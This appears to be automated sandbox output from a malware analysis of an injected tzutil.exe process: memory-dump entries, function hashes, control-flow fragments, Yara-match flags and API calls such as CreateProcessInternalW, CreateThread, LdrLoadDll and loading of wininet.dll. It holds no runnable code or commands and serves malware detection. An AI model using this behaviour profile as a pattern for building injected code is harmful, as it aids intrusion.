                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9d7111eb3569d1cb3939dc080a2f7369805607a7fd4c9fe09262dafc45d08487
                                                              • Instruction ID: 3e7c1a5601bd35e19e959f03bd01ddc64e3ab1d160a8f082f8b7d48bc0e71d5b
                                                              • Opcode Fuzzy Hash: 9d7111eb3569d1cb3939dc080a2f7369805607a7fd4c9fe09262dafc45d08487
                                                              • Instruction Fuzzy Hash: 32900265A11514424140B15C4844406600597E1701395C115A0554964C872889559269
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 33b62526d4f290143d188cd4d83335b65911120dd01f9b6138f3f9fcf8c7cb57
                                                              • Instruction ID: 0de7b8ff8a2752ee2c2d4e0fdfe7799b964af5a63d82817e2ac0f31a1c9c7673
                                                              • Opcode Fuzzy Hash: 33b62526d4f290143d188cd4d83335b65911120dd01f9b6138f3f9fcf8c7cb57
                                                              • Instruction Fuzzy Hash: 82900265612414034105B15C4454616400A87E0601B55C021E1014994DC63589916125
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e7a9f51de9bc68e57a91de275eddb1c268a4531fe2205d1f0c5e222f147fe3d2
                                                              • Instruction ID: 996450f4c36f198a68892aa2f462820858eca60e550de8c5b5cb15a05c9be4a9
                                                              • Opcode Fuzzy Hash: e7a9f51de9bc68e57a91de275eddb1c268a4531fe2205d1f0c5e222f147fe3d2
                                                              • Instruction Fuzzy Hash: EF900235A1541C02D150B15C4454746000587D0701F55C011A0024A58D87658B5576A1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f15826b80319bc3f34543e52223de11c09d9de7041227b697b3fdc3d8b5531e7
                                                              • Instruction ID: 9e24e7786c20dce33e377167312c6103e16ef3885a4b36f0e005eee4c62435fb
                                                              • Opcode Fuzzy Hash: f15826b80319bc3f34543e52223de11c09d9de7041227b697b3fdc3d8b5531e7
                                                              • Instruction Fuzzy Hash: E790023561141C02D180B15C444464A000587D1701F95C015A0025A58DCB258B5977A1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 63f80f501c5504e00e7ec52c0c58f76277c639a04facca350fe3075d3dbbf31d
                                                              • Instruction ID: 079dce7905aabf82f86fb371246bf4591f463629e25781046d5c0de8fb2f87a9
                                                              • Opcode Fuzzy Hash: 63f80f501c5504e00e7ec52c0c58f76277c639a04facca350fe3075d3dbbf31d
                                                              • Instruction Fuzzy Hash: F590023561545C42D140B15C4444A46001587D0705F55C011A0064A98D97358E55B661
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: d218972c9a01d2494aa872a9ace3c76199597ab90e274b18a49f28be23d6fccd
                                                              • Instruction ID: 134197061ce5e6dd287fe7544f18dc4c98dd43a2b92c78167f78f043b41ab53b
                                                              • Opcode Fuzzy Hash: d218972c9a01d2494aa872a9ace3c76199597ab90e274b18a49f28be23d6fccd
                                                              • Instruction Fuzzy Hash: 7C900229631414020145F55C064450B044597D6751395C015F1416994CC73189655321
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f7b60905079b93f88cadfb7e129dfbb45234787221910451c5eb4f9c35619bc3
                                                              • Instruction ID: 416adaa6de3ebe84f64523d3edd7282608df79fc88ac9728ea7c878b4363444c
                                                              • Opcode Fuzzy Hash: f7b60905079b93f88cadfb7e129dfbb45234787221910451c5eb4f9c35619bc3
                                                              • Instruction Fuzzy Hash: 6990043D731414030105F55C07445070047C7D5751355C031F1015D54CD731CD715131
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c16d94c322c2f9cf680cb250c3c8d59fd4870650cd4c2028b3f6637c39423b51
                                                              • Instruction ID: 470ce1a637501aa436eb02ccf19f05d997c93ba32eb0f364087e7501273cdc19
                                                              • Opcode Fuzzy Hash: c16d94c322c2f9cf680cb250c3c8d59fd4870650cd4c2028b3f6637c39423b51
                                                              • Instruction Fuzzy Hash: 0690026575141842D100B15C4454B060005C7E1701F55C015E1064958D8729CD526126
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: cdfa425b2e22135e1a4492c471605b7fd608b0874cd75cd333462f6e70fbfc8d
                                                              • Instruction ID: 9010e33d2b016f2beff0dd6ee16a498ec2cb2983bf618f27a51478bfc0eb28c8
                                                              • Opcode Fuzzy Hash: cdfa425b2e22135e1a4492c471605b7fd608b0874cd75cd333462f6e70fbfc8d
                                                              • Instruction Fuzzy Hash: 55900225A11414424140B16C88849064005ABE1611755C121A0998954D866989655665
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c2d0f30cc807f23b62c6e677511c6e5f2474e6bde74bfc2b8b9d031456e56705
                                                              • Instruction ID: 64fc514bea49eb1e74abae88d8c601352b7146a990cb364735727773d1464f15
                                                              • Opcode Fuzzy Hash: c2d0f30cc807f23b62c6e677511c6e5f2474e6bde74bfc2b8b9d031456e56705
                                                              • Instruction Fuzzy Hash: 5F900225621C1442D200B56C4C54B07000587D0703F55C115A0154958CCA2589615521
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 439ebff91fc907142cb55aa68a2c031433faf2ae12a92f856614484364424fe0
                                                              • Instruction ID: 0f1661da5468a54e64776752bdbe8d8f5c7599ec59aafa188d53af5a4234b99e
                                                              • Opcode Fuzzy Hash: 439ebff91fc907142cb55aa68a2c031433faf2ae12a92f856614484364424fe0
                                                              • Instruction Fuzzy Hash: DC900225A1141902D101B15C4444616000A87D0641F95C022A1024959ECB358A92A131
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bcbfb24bfceca95780b61676c15f049e28c59f6ec4324d25191894aa79672197
                                                              • Instruction ID: 654779eb474deca4b3cb438affe2999f700d5d59bab8ed48e697eb7f867f520d
                                                              • Opcode Fuzzy Hash: bcbfb24bfceca95780b61676c15f049e28c59f6ec4324d25191894aa79672197
                                                              • Instruction Fuzzy Hash: 3A90026561181803D140B55C4844607000587D0702F55C011A2064959E8B398D516135
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 50a0ab3e264b842fe3eca6c42094b1154d60e72c0c799b35c4131d1fde11ffd6
                                                              • Instruction ID: d92876e4c81d8d0f1c454c41c7c0636c5ac4ce0c5991735bf022baff4d744e0b
                                                              • Opcode Fuzzy Hash: 50a0ab3e264b842fe3eca6c42094b1154d60e72c0c799b35c4131d1fde11ffd6
                                                              • Instruction Fuzzy Hash: 3590022571141403D140B15C54586064005D7E1701F55D011E0414958CDA2589565222
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: cb1d7dc16cb3bac0e36aed285400b4d1e0547c8803bdc1e9d0ef0a1ac9f908e1
                                                              • Instruction ID: ad3ca3b2cff89b04842a61f94b2aa97558b999ac40ba035710b58cca18b0cf58
                                                              • Opcode Fuzzy Hash: cb1d7dc16cb3bac0e36aed285400b4d1e0547c8803bdc1e9d0ef0a1ac9f908e1
                                                              • Instruction Fuzzy Hash: CF90022D62341402D180B15C544860A000587D1602F95D415A001595CCCA2589695321
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7e2aac521d5903c9a588592897f922dcad5b8c5b2437cd1a201dd76ba6bff5f3
                                                              • Instruction ID: 7d656f49a76f399974318d6d701a500d711be846f8afffc54cf7b47697b4419c
                                                              • Opcode Fuzzy Hash: 7e2aac521d5903c9a588592897f922dcad5b8c5b2437cd1a201dd76ba6bff5f3
                                                              • Instruction Fuzzy Hash: 7190023561141813D111B15C4544707000987D0641F95C412A042495CD97668A52A121
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0

                                                              Control-flow Graph

                                                              control_flow_graph 429 ab114d-ab1158 430 ab115a-ab1166 429->430 431 ab11d8-ab1247 call acb890 call acc2a0 call ab4990 call aa13e0 call ac2000 429->431 432 ab1168 430->432 433 ab11c3-ab11d4 430->433 445 ab1249-ab1258 PostThreadMessageW 431->445 446 ab1267-ab126d 431->446 432->433 445->446 447 ab125a-ab1264 445->447 447->446
                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00AB1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416

                                                              Control-flow Graph

                                                              control_flow_graph 448 ab11d6-ab1247 call acb890 call acc2a0 call ab4990 call aa13e0 call ac2000 460 ab1249-ab1258 PostThreadMessageW 448->460 461 ab1267-ab126d 448->461 460->461 462 ab125a-ab1264 460->462 462->461
                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00AB1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416

                                                              Control-flow Graph

                                                              control_flow_graph 463 ab11e0-ab1247 call acb890 call acc2a0 call ab4990 call aa13e0 call ac2000 474 ab1249-ab1258 PostThreadMessageW 463->474 475 ab1267-ab126d 463->475 474->475 476 ab125a-ab1264 474->476 476->475
                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00AB1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 00AC3EDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AB4A02
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AB4A02
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,00AB8724,00000010,?,?,?,00000044,?,00000010,00AB8724,?,?,?), ref: 00AC9BB3
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AA9F62
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AA9F62
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00AB1E59,?,00AC5F17,00AB1E59,?,00AC5F17,?,00AB1E59,00AC59BF,00001000,?,00000000), ref: 00AC9AC9
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,00AB4211,000000F4), ref: 00AC9B09
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 00AB878A
                                                              Memory Dump Source
